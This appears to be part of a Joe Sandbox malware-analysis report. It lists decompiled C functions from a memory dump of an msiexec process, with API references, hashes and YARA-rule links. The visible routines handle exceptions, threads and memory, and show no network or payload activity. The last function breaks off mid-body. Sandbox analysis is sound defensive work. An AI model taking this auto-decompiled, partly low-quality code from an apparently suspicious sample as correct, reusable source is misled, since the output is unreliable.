								__eax = __ebx;
								__eax =  *__edx();
								__eflags = __eax;
								if(__eax == 0) {
									goto L1;
								} else {
									__edx =  *(__ebx + 0xc);
									goto L41;
								}
							}
						}
					} else {
						__eax =  &_a4;
						__eax = UnhandledExceptionFilter( &_a4); // executed
						__eflags = __eax;
						if(__eax == 0) {
							goto L44;
						} else {
							goto L36;
						}
					}
				}
			}

0x049d971f
0x049d97ae
0x049d97ae
0x049d97b0
0x049d9725
0x049d9725
0x049d972c
0x049d973d
0x049d973d
0x049d9741
0x049d9742
0x049d9747
0x049d9754
0x049d975a
0x049d975e
0x049d9764
0x049d9767
0x049d976a
0x049d9789
0x049d9789
0x049d978e
0x049d9794
0x049d9796
0x049d9798
0x049d9798
0x049d979a
0x049d979e
0x049d97a3
0x049d97a6
0x049d9d59
0x049d9d5c
0x049d9d5f
0x049d9d62
0x049d9d67
0x049d9d6b
0x049d9d70
0x049d9d71
0x049d9d72
0x049d976c
0x049d976c
0x049d9772
0x049d9774
0x049d9674
0x049d9677
0x049d967a
0x049d967c
0x049d9681
0x049d96af
0x049d96b4
0x049d96c7
0x049d96c7
0x049d96cc
0x049d96ce
0x049d96ce
0x049d96d1
0x00000000
0x049d96d3
0x049d96d1
0x049d96b6
0x049d96b6
0x049d96b8
0x049d96b8
0x049d96b8
0x049d96bd
0x00000000
0x049d96bf
0x049d96bf
0x049d96bf
0x049d96c0
0x049d96c2
0x049d96c2
0x049d96c3
0x00000000
0x049d96c5
0x049d96c3
0x049d96c0
0x049d96bd
0x049d96b6
0x049d9683
0x049d9683
0x049d96e1
0x049d9685
0x049d9685
0x049d968a
0x049d96a6
0x049d96a9
0x00000000
0x049d96ab
0x049d96ab
0x00000000
0x049d96ad
0x049d96ab
0x049d968c
0x049d968c
0x049d968e
0x049d968e
0x049d9693
0x049d9695
0x049d9695
0x049d969a
0x049d969c
0x049d969d
0x049d96ed
0x049d969f
0x049d9701
0x049d9701
0x049d969d
0x049d969a
0x049d9693
0x049d968c
0x049d968a
0x049d9683
0x049d970f
0x049d977a
0x049d977a
0x049d977c
0x049d977e
0x049d9780
0x00000000
0x049d9786
0x049d9786
0x00000000
0x049d9786
0x049d9780
0x049d9774
0x049d972e
0x049d972e
0x049d9733
0x049d9738
0x049d973b
0x00000000
0x00000000
0x00000000
0x00000000
0x049d973b
0x049d972c

APIs

UnhandledExceptionFilter.KERNEL32(00000006), ref: 049D9733

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: a145a6649ac845e00d503ca1b888c45655ab2e3cace4acc0cf9ce9c4689f92e2
Instruction ID: 822208b7539c0b20a7629d29387f9d00ac0af0a9ef1e7f47a28067c157afd843
Opcode Fuzzy Hash: a145a6649ac845e00d503ca1b888c45655ab2e3cace4acc0cf9ce9c4689f92e2
Instruction Fuzzy Hash: 8E31C8FD3082019BDB34BF28C984B767766A7C6304F55DA35D4098B654D724F881EB52

Uniqueness

Uniqueness Score: -1.00%

Function 049D9DE6, Relevance: 1.5, APIs: 1, Instructions: 49
threadCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E049D9DE6(struct _SECURITY_ATTRIBUTES* __eax, void __ecx, long __edx, DWORD* _a4, long _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				void* _t17;
				void* _t24;
				intOrPtr _t32;
				void* _t36;

				_v12 = __edx;
				_v8 = __eax;
				_t32 = _a12;
				if( *0x4c80034 == 0) {
					_t24 = E049D6EB8(8);
					 *_t24 = __ecx;
					 *((intOrPtr*)(_t24 + 4)) = _t32;
				} else {
					_t24 =  *0x4c80034();
				}
				 *0x4c9005d = 1;
				_t17 = CreateThread(_v8, _v12, E049D9DB0, _t24, _a8, _a4); // executed
				_t36 = _t17;
				if(_t36 == 0) {
					E049D6ED4(_t24);
				}
				return _t36;
			}

0x049d9df3
0x049d9df6
0x049d9df9
0x049d9e03
0x049d9e1d
0x049d9e1f
0x049d9e21
0x049d9e05
0x049d9e0f
0x049d9e0f
0x049d9e24
0x049d9e42
0x049d9e47
0x049d9e4b
0x049d9e4f
0x049d9e4f
0x049d9e5c

APIs

CreateThread.KERNEL32(?,?,Function_00009DB0,00000000,?,?), ref: 049D9E42

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: e75b6adeaf3e74e3a979ce986fa341d82313c0fba09bbb522abb4d207c4822ef
Instruction ID: daf8035310c2749ebdc0efea326acebeb96f54e4794ff52065dc9b33d739db8a
Opcode Fuzzy Hash: e75b6adeaf3e74e3a979ce986fa341d82313c0fba09bbb522abb4d207c4822ef
Instruction Fuzzy Hash: E2014476705214AFDB11DA9DD884B9EB7ECDB59264F118176F508DB340D674ED00C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 049D9712, Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E049D9712(struct _EXCEPTION_POINTERS _a4, long _a8) {
				long _v12;
				long _v16;
				signed int _v21;
				void* __ebp;
				void* _t19;
				long _t20;
				long _t25;
				long _t26;
				void* _t30;
				void* _t31;
				void* _t39;
				void* _t40;

				__eax = _a4.ExceptionRecord;
				__eflags =  *(__eax + 4) & 0x00000006;
				if(( *(__eax + 4) & 0x00000006) != 0) {
					L45:
					__eax = 0;
					__eflags = 0;
					return 0;
				} else {
					__eflags =  *0x4c80030;
					if( *0x4c80030 > 0) {
						L37:
						__eax = _a4.ExceptionRecord;
						asm("cld");
						__eax = E049D7D90(_a4.ExceptionRecord);
						__edx = _a8;
						__eax =  *0x4c90020(_a8, E049D975A, __eax, 0);
						__ebx = _v12;
						__eflags =  *__ebx - 0xeedfade;
						__edx =  *(__ebx + 0x14);
						__eax =  *(__ebx + 0x18);
						if( *__ebx == 0xeedfade) {
							L42:
							__eax = E049D91B4(__eax);
							__ecx =  *0x4c9000c; // 0x0
							__eflags = __ecx;
							if(__ecx != 0) {
								__eax =  *__ecx();
							}
							__ecx = _v12;
							__eax = 0xd9;
							__edx =  *(__ecx + 0x14);
							_v16 =  *(__ecx + 0x14);
							__ebp = __esp;
							_v21 = __al;
							__eax = _v16;
							 *0x4c80004 = _v16;
							__eax = _v21 & 0x000000ff;
							__eax = E049D9D4C(_v21 & 0x000000ff);
							__ecx = __ecx;
							__ebp = __ebp;
							return __eax;
						} else {
							__edx =  *0x4c90018; // 0x0
							__eflags = __edx;
							if(__edx == 0) {
								L1:
								_t33 = _v12;
								_t19 =  *_v12;
								_t39 = _t19 - 0xc0000092;
								if(_t39 > 0) {
									__eflags = _t19 - 0xc0000096;
									if(__eflags > 0) {
										_t20 = _t19 - 0xc00000fd;
										__eflags = _t20;
										if(_t20 == 0) {
										} else {
											__eflags = _t20 != 0x3d;
											if(_t20 != 0x3d) {
												goto L32;
											}
										}
									} else {
										if(__eflags == 0) {
										} else {
											_t25 = _t19 - 0xc0000093;
											__eflags = _t25;
											if(_t25 == 0) {
												goto L27;
											} else {
												_t26 = _t25 - 1;
												__eflags = _t26;
												if(_t26 == 0) {
												} else {
													__eflags = _t26 != 1;
													if(_t26 != 1) {
														goto L32;
													}
												}
											}
										}
									}
								} else {
									if(_t39 == 0) {
										L24:
									} else {
										_t40 = _t19 - 0xc000008e;
										if(_t40 > 0) {
											__eflags = _t19 + 0x3fffff71 - 2;
											if(__eflags < 0) {
												goto L24;
											} else {
												if(__eflags != 0) {
													goto L32;
												}
											}
										} else {
											if(_t40 == 0) {
											} else {
												_t30 = _t19 - 0xc0000005;
												if(_t30 == 0) {
												} else {
													_t31 = _t30 - 0x87;
													if(_t31 == 0) {
													} else {
														if(_t31 == 1) {
															L27:
														} else {
															L32:
														}
													}
												}
											}
										}
									}
								}
								return E049D6FBC( *((intOrPtr*)(_t33 + 0xc)));
							} else {
								__eax = __ebx;
								__eax =  *__edx();
								__eflags = __eax;
								if(__eax == 0) {
									goto L1;
								} else {
									__edx =  *(__ebx + 0xc);
									goto L42;
								}
							}
						}
					} else {
						__eax =  &_a4;
						__eax = UnhandledExceptionFilter( &_a4); // executed
						__eflags = __eax;
						if(__eax == 0) {
							goto L45;
						} else {
							goto L37;
						}
					}
				}
			}

0x049d9714
0x049d9718
0x049d971f
0x049d97ae
0x049d97ae
0x049d97ae
0x049d97b0
0x049d9725
0x049d9725
0x049d972c
0x049d973d
0x049d973d
0x049d9741
0x049d9742
0x049d9747
0x049d9754
0x049d975a
0x049d975e
0x049d9764
0x049d9767
0x049d976a
0x049d9789
0x049d9789
0x049d978e
0x049d9794
0x049d9796
0x049d9798
0x049d9798
0x049d979a
0x049d979e
0x049d97a3
0x049d97a6
0x049d9d59
0x049d9d5c
0x049d9d5f
0x049d9d62
0x049d9d67
0x049d9d6b
0x049d9d70
0x049d9d71
0x049d9d72
0x049d976c
0x049d976c
0x049d9772
0x049d9774
0x049d9674
0x049d9677
0x049d967a
0x049d967c
0x049d9681
0x049d96af
0x049d96b4
0x049d96c7
0x049d96c7
0x049d96cc
0x049d96ce
0x049d96ce
0x049d96d1
0x00000000
0x049d96d3
0x049d96d1
0x049d96b6
0x049d96b6
0x049d96b8
0x049d96b8
0x049d96b8
0x049d96bd
0x00000000
0x049d96bf
0x049d96bf
0x049d96bf
0x049d96c0
0x049d96c2
0x049d96c2
0x049d96c3
0x00000000
0x049d96c5
0x049d96c3
0x049d96c0
0x049d96bd
0x049d96b6
0x049d9683
0x049d9683
0x049d96e1
0x049d9685
0x049d9685
0x049d968a
0x049d96a6
0x049d96a9
0x00000000
0x049d96ab
0x049d96ab
0x00000000
0x049d96ad
0x049d96ab
0x049d968c
0x049d968c
0x049d968e
0x049d968e
0x049d9693
0x049d9695
0x049d9695
0x049d969a
0x049d969c
0x049d969d
0x049d96ed
0x049d969f
0x049d9701
0x049d9701
0x049d969d
0x049d969a
0x049d9693
0x049d968c
0x049d968a
0x049d9683
0x049d970f
0x049d977a
0x049d977a
0x049d977c
0x049d977e
0x049d9780
0x00000000
0x049d9786
0x049d9786
0x00000000
0x049d9786
0x049d9780
0x049d9774
0x049d972e
0x049d972e
0x049d9733
0x049d9738
0x049d973b
0x00000000
0x00000000
0x00000000
0x00000000
0x049d973b
0x049d972c

APIs

UnhandledExceptionFilter.KERNEL32(00000006), ref: 049D9733

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 7ee0cdc3598a6f73044c8e7d49cc0e78027cd09e56e37d9aa1af687ca163a53c
Instruction ID: df1795e41776a18ac4d00303eef1fa257b33cbd919118cafb056bf6b61d793e3
Opcode Fuzzy Hash: 7ee0cdc3598a6f73044c8e7d49cc0e78027cd09e56e37d9aa1af687ca163a53c
Instruction Fuzzy Hash: B10108B8304241ABDB28EF69D8C4B2B77EAEFC5704F14C568A84A8B245D734FC41DB51

Uniqueness

Uniqueness Score: -1.00%

Function 049DC83C, Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E049DC83C(void* __eax) {
				short _v532;
				void* __ebx;
				void* __esi;
				intOrPtr _t14;
				void* _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t16 = __eax;
				_t22 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameW( *(__eax + 4),  &_v532, 0x20a);
					_t14 = E049DDAC8(_t21, _t16, _t18, _t19, _t22); // executed
					_t20 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t20;
					if(_t20 == 0) {
						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}

0x049dc844
0x049dc846
0x049dc84a
0x049dc85a
0x049dc863
0x049dc868
0x049dc86a
0x049dc86f
0x049dc874
0x049dc874
0x049dc86f
0x049dc882

APIs

GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 049DC85A

Part of subcall function 049DDAC8: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,049DDB82,?,?,00000000), ref: 049DDB04
Part of subcall function 049DDAC8: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,049DDB82,?,?,00000000), ref: 049DDB55

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: FileModuleName$LibraryLoad
String ID:
API String ID: 4113206344-0
Opcode ID: be4b9286cbfb36aa5cf98a064326f7a7da1fc04837287e3c164466a17388e58a
Instruction ID: f123b3d913956782e22ec1a80aa3195fc7ab4aef2a9401486770718690e46673
Opcode Fuzzy Hash: be4b9286cbfb36aa5cf98a064326f7a7da1fc04837287e3c164466a17388e58a
Instruction Fuzzy Hash: FBE0ED75A003109BDB10DE6CC8C4E5637D8AB49668F048A71ED64CF286E3B1E910CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 049DDD6C, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E049DDD6C(intOrPtr* __eax) {
				void* _t5;
				intOrPtr* _t6;

				_t6 =  *__eax;
				if(_t6 != 0) {
					 *__eax = 0;
					 *((intOrPtr*)( *_t6 + 8))(__eax);
					_t5 = _t6;
					return _t5;
				}
				return __eax;
			}

0x049ddd6c
0x049ddd70
0x049ddd72
0x049ddd7c
0x049ddd7f
0x00000000
0x049ddd7f
0x049ddd80

APIs

IUnknown_Release_Proxy.RPCRT4(?,?,049D8346,00000000,049D1780,049DF0B4,?,04A8A700,049DB437,04A8A700,?,?,049DB535,?,?,?), ref: 049DDD7C

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: ProxyRelease_Unknown_
String ID:
API String ID: 2108461177-0
Opcode ID: e60cb4945767619aba17da86e8a85bd83280a13d8f23fd196f03e66ea3d050c3
Instruction ID: e45592587f71d89cd0ffa6b358d43be539d5aff3d5ef3ffcbd8010c4bc6add6f
Opcode Fuzzy Hash: e60cb4945767619aba17da86e8a85bd83280a13d8f23fd196f03e66ea3d050c3
Instruction Fuzzy Hash: 3CC04CB41011019FE7119F05C844B6277B9EF85711F29C194E405CB134DB30AC40CA60

Uniqueness

Uniqueness Score: -1.00%

Function 049E08E0, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E049E08E0() {
				void* _t1;
				long _t2;
				int _t3;

				_t1 = 0x48;
				if(0x48 != 0) {
					_t1 = E049E08A8();
					if( *0x4c80c18 != 0xffffffff) {
						_t2 =  *0x4c80c18; // 0x1e
						_t3 = TlsFree(_t2); // executed
						return _t3;
					}
				}
				return _t1;
			}

0x049e08e0
0x049e08e7
0x049e08e9
0x049e08f5
0x049e08f7
0x049e08fd
0x00000000
0x049e08fd
0x049e08f5
0x049e0902

APIs

Part of subcall function 049E08A8: TlsGetValue.KERNEL32(0000001E), ref: 049E08C0
Part of subcall function 049E08A8: LocalFree.KERNEL32(00000000,0000001E), ref: 049E08CA
Part of subcall function 049E08A8: TlsSetValue.KERNEL32(0000001E,00000000,00000000,0000001E), ref: 049E08D7

TlsFree.KERNEL32(0000001E), ref: 049E08FD

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: FreeValue$Local
String ID:
API String ID: 2930853931-0
Opcode ID: 8190d9f41c993a054ba1f1001926ade35c81af80bedc12bf6d90e6874b883124
Instruction ID: 2ed7c0ed7d3ad763c2a958b6ced2c53825a3caf8b6e4dec373cb239280fa014f
Opcode Fuzzy Hash: 8190d9f41c993a054ba1f1001926ade35c81af80bedc12bf6d90e6874b883124
Instruction Fuzzy Hash: FCC08C74101229C2FBA26E6F8904338211CEFA0324F40033C93B0810C2CEBCE8DF86A6

Uniqueness

Uniqueness Score: -1.00%

Function 049D9E60, Relevance: 1.5, APIs: 1, Instructions: 9
threadCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E049D9E60(long __eax) {
				long _t1;
				long _t3;

				_t1 = __eax;
				_t3 = __eax;
				if( *0x4c80038 != 0) {
					_t1 =  *0x4c80038();
				}
				ExitThread(_t3); // executed
				return _t1;
			}

0x049d9e60
0x049d9e61
0x049d9e6a
0x049d9e6e
0x049d9e6e
0x049d9e75
0x049d9e7b

APIs

ExitThread.KERNEL32 ref: 049D9E75

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: ExitThread
String ID:
API String ID: 2158977761-0
Opcode ID: 69152ff770547d0346bdac48d91a5813ee31f15114574e72d7485c40bc947b36
Instruction ID: 93fd10c568e07516cd3da2f89764670e014e13bf02a79dcef533978605d7f061
Opcode Fuzzy Hash: 69152ff770547d0346bdac48d91a5813ee31f15114574e72d7485c40bc947b36
Instruction Fuzzy Hash: 08C09B6520030057D34176755CCC746316C9B0D25DF13557C510787151D77C9CCCD710

Uniqueness

Uniqueness Score: -1.00%

Function 049D57A2, Relevance: 1.3, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E049D57A2(void* __eax) {
				struct _MEMORY_BASIC_INFORMATION _v44;
				void* _v48;
				void* _t13;
				int _t20;
				void* _t22;
				signed int _t26;
				signed int _t29;
				signed int _t30;
				void* _t34;
				intOrPtr _t35;
				signed int _t39;
				void* _t41;
				void* _t42;

				_push(_t29);
				_t42 = _t41 + 0xffffffdc;
				_t34 = __eax - 0x10;
				E049D56F4();
				_t13 = _t34;
				 *_t42 =  *_t13;
				_v48 =  *((intOrPtr*)(_t13 + 4));
				_t26 =  *(_t13 + 0xc);
				if((_t26 & 0x00000008) != 0) {
					_t22 = _t34;
					_t39 = _t26 & 0xfffffff0;
					_t30 = 0;
					while(1) {
						VirtualQuery(_t22,  &_v44, 0x1c);
						if(VirtualFree(_t22, 0, 0x8000) == 0) {
							break;
						}
						_t35 = _v44.RegionSize;
						if(_t39 > _t35) {
							_t39 = _t39 - _t35;
							_t22 = _t22 + _t35;
							continue;
						}
						goto L10;
					}
					_t30 = _t30 | 0xffffffff;
				} else {
					_t20 = VirtualFree(_t34, 0, 0x8000); // executed
					if(_t20 == 0) {
						_t30 = _t29 | 0xffffffff;
					} else {
						_t30 = 0;
					}
				}
				L10:
				if(_t30 == 0) {
					 *_v48 =  *_t42;
					 *( *_t42 + 4) = _v48;
				}
				 *0x4c92b7c = 0;
				return _t30;
			}

0x049d57a6
0x049d57a8
0x049d57ad
0x049d57b0
0x049d57b5
0x049d57b9
0x049d57bf
0x049d57c3
0x049d57c9
0x049d57e5
0x049d57e9
0x049d57ec
0x049d57ee
0x049d57f6
0x049d580a
0x00000000
0x00000000
0x049d5811
0x049d5817
0x049d5819
0x049d581b
0x00000000
0x049d581b
0x00000000
0x049d5817
0x049d580c
0x049d57cb
0x049d57d3
0x049d57da
0x049d57e0
0x049d57dc
0x049d57dc
0x049d57dc
0x049d57da
0x049d581f
0x049d5821
0x049d582a
0x049d5833
0x049d5833
0x049d5836
0x049d5846

APIs

VirtualFree.KERNEL32(?,00000000,00008000), ref: 049D57D3
VirtualQuery.KERNEL32(?,?,0000001C), ref: 049D57F6
VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 049D5803

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: Virtual$Free$Query
String ID:
API String ID: 778034434-0
Opcode ID: 5f8eb1f12eb0937ccccea3aae8a9b76760f9a2c22c42327154769cb4ce0ca410
Instruction ID: f688a5751abcd6dabd84473b765523adf40ca5779055c8a8b9c045fa97a65695
Opcode Fuzzy Hash: 5f8eb1f12eb0937ccccea3aae8a9b76760f9a2c22c42327154769cb4ce0ca410
Instruction Fuzzy Hash: 4BF03175704600AFD711DF1EC984B17B7E5EFC9660F16C579E98887350E631EC058B92

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 049DD1BC, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 140
stringlibraryfileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E049DD1BC(short* __eax, intOrPtr __edx) {
				short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				struct _WIN32_FIND_DATAW _v612;
				short _v1134;
				signed int _t50;
				signed int _t51;
				void* _t55;
				signed int _t88;
				signed int _t89;
				intOrPtr* _t90;
				signed int _t101;
				signed int _t102;
				short* _t112;
				struct HINSTANCE__* _t113;
				short* _t115;
				short* _t116;
				void* _t117;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t113 = GetModuleHandleW(L"kernel32.dll");
				if(_t113 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t115 = _v8 + 4;
						goto L10;
					} else {
						if( *((short*)(_v8 + 2)) == 0x5c) {
							_t116 = E049DD198(_v8 + 4);
							if( *_t116 != 0) {
								_t14 = _t116 + 2; // 0x2
								_t115 = E049DD198(_t14);
								if( *_t115 != 0) {
									L10:
									_t88 = _t115 - _v8;
									_t89 = _t88 >> 1;
									if(_t88 < 0) {
										asm("adc ebx, 0x0");
									}
